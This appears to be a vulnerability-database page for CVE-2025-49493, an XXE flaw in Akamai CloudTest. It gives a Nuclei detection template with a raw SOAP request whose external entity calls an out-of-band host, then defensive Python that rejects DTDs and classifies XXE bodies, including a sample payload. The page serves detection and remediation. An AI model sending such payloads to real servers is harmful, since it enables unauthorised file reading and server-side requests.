
Akamai CloudTest < 60 2025.06.02 - XML External Entity (XXE)

CVE-2025-49493
Verified

Description

Akamai CloudTest before 60 2025.06.02 (12988) allows file inclusion via XML External Entity (XXE) injection.

Severity

Critical

CVSS Score

9.1

Exploit Probability

2%

Affected Product

cloudtest

Published Date

July 1, 2025

Template Author

xbow, 3th1c_yuk1

CVE-2025-49493.yaml
id: CVE-2025-49493

info:
  name: Akamai CloudTest < 60 2025.06.02 - XML External Entity (XXE)
  author: xbow,3th1c_yuk1
  severity: critical
  description: |
    Akamai CloudTest before 60 2025.06.02 (12988) allows file inclusion via XML External Entity (XXE) injection.
  impact: |
    Unauthenticated attackers can exploit XXE injection to read arbitrary files from the server through malicious XML entities in SOAP requests.
  remediation: |
    Upgrade Akamai CloudTest to version 60 2025.06.02 (12988) or later that properly disables external entity processing.
  reference:
    - https://xbow.com/blog/xbow-akamai-cloudtest-xxe/
    - https://techdocs.akamai.com/cloudtest/changelog/june-2-2025-enhancements-and-bug-fixes
    - https://nvd.nist.gov/vuln/detail/CVE-2025-49493
  classification:
    epss-score: 0.01863
    epss-percentile: 0.83541
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2025-49493
    cwe-id: CWE-611
    cpe: cpe:2.3:a:akamai:cloudtest:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"Akamai CloudTest"
    vendor: akamai
    product: cloudtest
  tags: cve,cve2025,akamai,cloudtest,xxe,oast,rce,vkev,vuln

http:
  - raw:
      - |
        POST /concerto/services/RepositoryService HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/html
        SOAPAction: ""

        <?xml version="1.0" encoding="UTF-8"?>
        <!DOCTYPE soapenv:Envelope [
          <!ENTITY xxe SYSTEM "http://{{interactsh-url}}">
        ]>
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                          xmlns:rep="http://example.com/services/repository">
           <soapenv:Header/>
           <soapenv:Body>
              <rep:getUIBundleObjectXml>
                 <rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
              </rep:getUIBundleObjectXml>
           </soapenv:Body>
        </soapenv:Envelope>

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(content_type, "text/xml")'
          - 'contains(body, "XML stream")'
        condition: and
# digest: 4a0a0047304502205220ffed144c738f6317e8f52804368391160209a0ea8de90e0a27782f69a40b022100d4430893fd79ce9feeafe3e770fd40a16b1821659c3bc8d148fb83ecb8635479:922c64590222798bb761d5b6d8e72950
CVSS Metrics

CVSS Score: 9.1
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
CVE ID: CVE-2025-49493
CWE ID: CWE-611

References

https://xbow.com/blog/xbow-akamai-cloudtest-xxe/
https://techdocs.akamai.com/cloudtest/changelog/june-2-2025-enhancements-and-bug-fixes
https://nvd.nist.gov/vuln/detail/CVE-2025-49493

Remediation Steps

Upgrade Akamai CloudTest to version 60 2025.06.02 (12988) or later, which properly disables external entity processing.
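Where upgrading is not immediate, the usual compensating control is to stop DTDs from ever reaching the XML parser behind the SOAP endpoint. The following is an added example, not Akamai's code and not part of the Nuclei template: a pre-filter that refuses any request body carrying a DOCTYPE or ENTITY declaration, a parse helper that applies the filter before handing the body to Python's standard-library parser (standing in for whatever parser CloudTest actually uses), and a triage classifier for WAF or log review that separates the external-entity pattern this CVE uses from other DTD usage. The endpoint path is the one named in the template; the sample bodies, the `oast.invalid` host and every function name are constructed for this example.

```python
import re
import xml.etree.ElementTree as ET

# Endpoint named in the Nuclei template on this page (page-sourced value).
REPOSITORY_SERVICE_PATH = "/concerto/services/RepositoryService"

# Every XXE variant (file read, SSRF/OAST callback, entity-expansion DoS) needs a
# DTD in the prolog. SOAP never needs one, so its presence is itself the signal.
_DTD_MARKERS = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)

# An entity whose replacement text comes from a SYSTEM or PUBLIC identifier is
# the external-entity pattern (CWE-611) described for CVE-2025-49493.
_EXTERNAL_ENTITY = re.compile(
    rb"<!ENTITY\s+(%\s*)?[\w.:-]+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE
)


class DtdNotAllowed(ValueError):
    """Raised when a request body carries a DTD and is refused before parsing."""


def reject_dtd(body: bytes) -> None:
    """Defense in depth for a SOAP endpoint: refuse the whole document rather
    than reasoning about what its entities would do once expanded."""
    if _DTD_MARKERS.search(body):
        raise DtdNotAllowed("DOCTYPE/ENTITY declarations are not accepted")


def parse_soap_body(body: bytes) -> ET.Element:
    """Apply the pre-filter, then parse. The stdlib expat backend does not fetch
    external entities, but the filter means correctness never depends on that
    parser default; a DTD-bearing body is rejected outright."""
    reject_dtd(body)
    return ET.fromstring(body)


def is_rejected(body: bytes) -> bool:
    """Convenience wrapper for checks: True if the pre-filter refuses the body."""
    try:
        parse_soap_body(body)
    except DtdNotAllowed:
        return True
    return False


def classify_body(body: bytes) -> str:
    """Triage label for WAF or log review:
    'external-entity' -> SYSTEM/PUBLIC entity (the CVE-2025-49493 shape)
    'dtd'             -> any other DOCTYPE/ENTITY declaration
    'clean'           -> no DTD at all"""
    if _EXTERNAL_ENTITY.search(body):
        return "external-entity"
    if _DTD_MARKERS.search(body):
        return "dtd"
    return "clean"


# Constructed samples (not captured traffic). BENIGN_SOAP mirrors the template's
# SOAP operation with an ordinary value; the other two carry a DTD.
BENIGN_SOAP = b"""<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:rep="http://example.com/services/repository">
  <soapenv:Body>
    <rep:getUIBundleObjectXml>
      <rep:uiBundleRequestXml>bundle-1</rep:uiBundleRequestXml>
    </rep:getUIBundleObjectXml>
  </soapenv:Body>
</soapenv:Envelope>"""

EXTERNAL_ENTITY_SOAP = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
  <!ENTITY xxe SYSTEM "http://oast.invalid/">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body><x>&xxe;</x></soapenv:Body>
</soapenv:Envelope>"""

INTERNAL_ENTITY_SOAP = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [ <!ENTITY greeting "hello"> ]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body><x>&greeting;</x></soapenv:Body>
</soapenv:Envelope>"""


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SOAP),
                          ("external-entity", EXTERNAL_ENTITY_SOAP),
                          ("internal-entity", INTERNAL_ENTITY_SOAP)):
        print(f"{label:16} class={classify_body(sample):16} "
              f"rejected={is_rejected(sample)} "
              f"path={REPOSITORY_SERVICE_PATH}")
```

The filter is deliberately coarse: it refuses a `<!DOCTYPE` even inside a comment or CDATA section, which is the right trade for a SOAP service that has no legitimate use for DTDs. The classifier's "external-entity" label corresponds to the request shape in the template's `raw` block, so it is the one to alert on when reviewing traffic to the RepositoryService endpoint; "dtd" is worth logging but usually indicates a misbehaving client rather than this CVE.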